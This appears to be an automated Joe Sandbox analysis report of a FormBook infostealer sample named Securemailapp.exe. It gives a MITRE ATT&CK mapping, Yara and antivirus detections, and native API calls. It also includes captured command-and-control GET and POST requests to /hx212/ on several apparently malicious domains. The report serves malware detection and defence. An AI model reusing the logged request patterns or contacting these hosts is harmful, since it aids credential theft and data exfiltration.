Analysis Report Securemailapp.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 219536
Start date: 01.04.2020
Start time: 16:46:53
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 9s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Securemailapp.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/11@22/9
EGA Information:
  • Successful, ratio: 33.3%
HDC Information:
  • Successful, ratio: 52.7% (good quality ratio 50.2%)
  • Quality average: 72.3%
  • Quality standard deviation: 28.9%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 48
  • Number of non-executed functions: 248
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, MusNotifyIcon.exe, svchost.exe, UsoClient.exe
  • Excluded IPs from analysis (whitelisted): 40.90.23.154, 40.90.137.120, 40.90.137.124, 51.143.111.7, 2.18.68.82
  • Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, fs.microsoft.com, lgin.msa.trafficmanager.net, login.live.com, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, login.msa.msidentity.com
  • Execution Graph export aborted for target chkdskuda.exe, PID 2976 because it is empty
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 |  | false | FormBook | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Execution through Module Load 1 | Registry Run Keys / Startup Folder 1 | Process Injection 512 | Software Packing 11 | Credential Dumping 1 | Security Software Discovery 31 | Remote File Copy 3 | Man in the Browser 1 | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Graphical User Interface 1 | Port Monitors | Accessibility Features | Disabling Security Tools 1 | Network Sniffing | File and Directory Discovery 2 | Remote Services | Data from Local System 1 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Windows Management Instrumentation | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information 1 | Input Capture | System Information Discovery 23 | Windows Remote Management | Email Collection 1 | Automated Exfiltration | Standard Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Scheduled Task | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information 3 | Credentials in Files | Virtualization/Sandbox Evasion 4 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 14 | SIM Card Swap |  | Premium SMS Toll Fraud
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading 11 | Account Manipulation | Process Discovery 2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion 4 | Brute Force | Remote System Discovery 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service |  | Abuse Accessibility Features
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection 512 | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Spearphishing via Service | Third-party Software | Logon Scripts | Process Injection | DLL Side-Loading 1 | Bash History | Network Service Scanning | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Securemailapp.exe | Virustotal: Detection: 64%
Source: Securemailapp.exe | ReversingLabs: Detection: 46%
Yara detected FormBook
Source: Yara match | File source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Securemailapp.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.InstallUtil.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then pop edi | 2_2_004140D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then pop ebx | 2_2_00405465

Networking:

HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=yuATxVRg6V03zt9fmkHVG7SVgWpl6/Z6tDeIEtza45Xi+B/vKHFgBV6ZVx3ahKEkFxT0&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.your-date-here.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=chNEXokLq7hW8HvKkY2dcNEQeJ5GKWGLAWl1+X6aOcyDV8302CPyRRACxVQRPL3iiqaQ&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.agaroseresins.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=2H5oEqApcZqqJ6qLyjFERWiUI7bCbufBKCMghUsAFeTsJ5P0iZtpaBZczhNc8rDwu6V1&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.cszlhz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=bM4Xun1pI6ZOV5ZHYseigAPkvvck2Cij1ewApu5ohFDlZ8aGsxAg5ufu1RC6vK+1jaDm&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.skylineluxuryhomeschicago.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=8sUyA4WO5fe1gCDgOO3DHmlO4MdYzsfah5NcuQxOl3hW/0/R9dWPAXciXHbnM6Y/IAid&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.covpsychiz.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=sml3n6l49EPSCa7vMPh/SuuWi1599qVmQUcMIo3tt8Fu8A6Qgu0IlzGyXmIb1Url3LIn&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.thescarfhut.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=ZsyByF5b0EkK3lQ42YrSke2rzN/49RgUkpyRf/X/Lp8mJH7kxaV2xoRALuGc5Mm0xYDM&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.artysancr.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=wKfpUO9plDGv2T++KqO84WhM5OOWvYWxYhu9D8K5Zh6fySGSwmXnDP6Ufhr7dtYnSq9Q&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.ardrome.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /hx212/?Ev=7w0YytMHoI4nsjP+y0IMrc86PWQ/iAHGw4E6AnUW3tdwa4iK0mJdGm+TIKrUlQMYe/Zk&ljo=MDKPFFDXDxJXypBP HTTP/1.1 | Host: www.xn--u9j813lsxe15po01b.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 184.168.131.241 184.168.131.241
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: unknown unknown
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.agaroseresins.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.agaroseresins.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.agaroseresins.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.cszlhz.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.cszlhz.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.cszlhz.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.skylineluxuryhomeschicago.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.skylineluxuryhomeschicago.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.skylineluxuryhomeschicago.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.covpsychiz.info | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.covpsychiz.info | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.covpsychiz.info/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.thescarfhut.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.thescarfhut.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.thescarfhut.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.artysancr.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.artysancr.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.artysancr.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.ardrome.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.ardrome.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.ardrome.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /hx212/ HTTP/1.1 | Host: www.xn--u9j813lsxe15po01b.com | Connection: close | Content-Length: 168668 | Cache-Control: no-cache | Origin: http://www.xn--u9j813lsxe15po01b.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.xn--u9j813lsxe15po01b.com/hx212/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Downloads files from webservers via HTTP
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=yuATxVRg6V03zt9fmkHVG7SVgWpl6/Z6tDeIEtza45Xi+B/vKHFgBV6ZVx3ahKEkFxT0&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.your-date-here.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=chNEXokLq7hW8HvKkY2dcNEQeJ5GKWGLAWl1+X6aOcyDV8302CPyRRACxVQRPL3iiqaQ&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.agaroseresins.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=2H5oEqApcZqqJ6qLyjFERWiUI7bCbufBKCMghUsAFeTsJ5P0iZtpaBZczhNc8rDwu6V1&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.cszlhz.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=bM4Xun1pI6ZOV5ZHYseigAPkvvck2Cij1ewApu5ohFDlZ8aGsxAg5ufu1RC6vK+1jaDm&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.skylineluxuryhomeschicago.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=8sUyA4WO5fe1gCDgOO3DHmlO4MdYzsfah5NcuQxOl3hW/0/R9dWPAXciXHbnM6Y/IAid&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.covpsychiz.info, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=sml3n6l49EPSCa7vMPh/SuuWi1599qVmQUcMIo3tt8Fu8A6Qgu0IlzGyXmIb1Url3LIn&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.thescarfhut.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=ZsyByF5b0EkK3lQ42YrSke2rzN/49RgUkpyRf/X/Lp8mJH7kxaV2xoRALuGc5Mm0xYDM&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.artysancr.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=wKfpUO9plDGv2T++KqO84WhM5OOWvYWxYhu9D8K5Zh6fySGSwmXnDP6Ufhr7dtYnSq9Q&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.ardrome.com, Connection: close
Source: global traffic, HTTP traffic detected: GET /hx212/?Ev=7w0YytMHoI4nsjP+y0IMrc86PWQ/iAHGw4E6AnUW3tdwa4iK0mJdGm+TIKrUlQMYe/Zk&ljo=MDKPFFDXDxJXypBP HTTP/1.1, Host: www.xn--u9j813lsxe15po01b.com, Connection: close
Performs DNS lookups
Source: unknown, DNS traffic detected: queries for: www.your-date-here.com
Posts data to webserver
Source: unknown, HTTP traffic detected:
  POST /hx212/ HTTP/1.1
  Host: www.agaroseresins.com
  Connection: close
  Content-Length: 168668
  Cache-Control: no-cache
  Origin: http://www.agaroseresins.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.agaroseresins.com/hx212/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 01 Apr 2020 14:51:38 GMT
  Server: Apache/2.4.29 (Ubuntu)
  Content-Length: 329
  Connection: close
  Content-Type: text/html; charset=utf-8
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hx212/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Urls found in memory or binary data
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.578591179.0000000002630000.00000004.00000001.sdmp, String found in binary or memory: http://ns.adob1
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: http://www.google.ch/
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: http://www.google.ch/q
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/?ocid=iehp%
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: http://www.msn.com/ocid=iehp
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.602882298.000000000B276000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 00000007.00000003.782140485.000000000004E000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.php?ci
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=19
Source: chkdsk.exe, 00000007.00000003.782140485.000000000004E000.00000004.00000001.sdmp, String found in binary or memory: https://ogs.go
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://ogs.google.com/widget/callout?hl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=190
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://ogs.google.com/widget/callouthl=en&origin=https%3A%2F%2Fwww.google.ch&pid=1&spid=1&prid=1901
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.ch/?gws_rd=ssl
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.ch/?gws_rd=sslLMEMhh_
Source: chkdsk.exe, 00000007.00000003.781276725.000000000004D000.00000004.00000001.sdmp, String found in binary or memory: https://www.google.ch/favicon.ico

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.623997254.0000000000D70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.623674502.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.622710007.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
.NET source code contains very large array initializations
Source: Securemailapp.exe, wtf/gaRCmQnkObbkusNLMcWH.cs, Large array initialization: ArrayBytes: array initializer size 67088
Source: 0.0.Securemailapp.exe.7f0000.0.unpack, wtf/gaRCmQnkObbkusNLMcWH.cs, Large array initialization: ArrayBytes: array initializer size 67088
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416BE0 NtCreateFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416C90 NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416D10 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416DC0 NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416C8A NtReadFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416D0A NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_00416DBB NtAllocateVirtualMemory
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A360 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A3E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A240 NtReadFile, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A2D0 NtClose, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A560 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A540 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A5F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A410 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A4A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A480 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A720 NtResumeThread, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A700 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A750 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A610 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A6A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A800 NtSetValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125B0B0 NtGetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A310 NtEnumerateValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A370 NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A350 NtQueryValueKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A3D0 NtCreateKey
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A220 NtWaitForSingleObject
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125BA30 NtSetContextThread
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A260 NtWriteFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A2F0 NtQueryInformationFile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, Code function: 2_2_0125A520 NtEnumerateKey
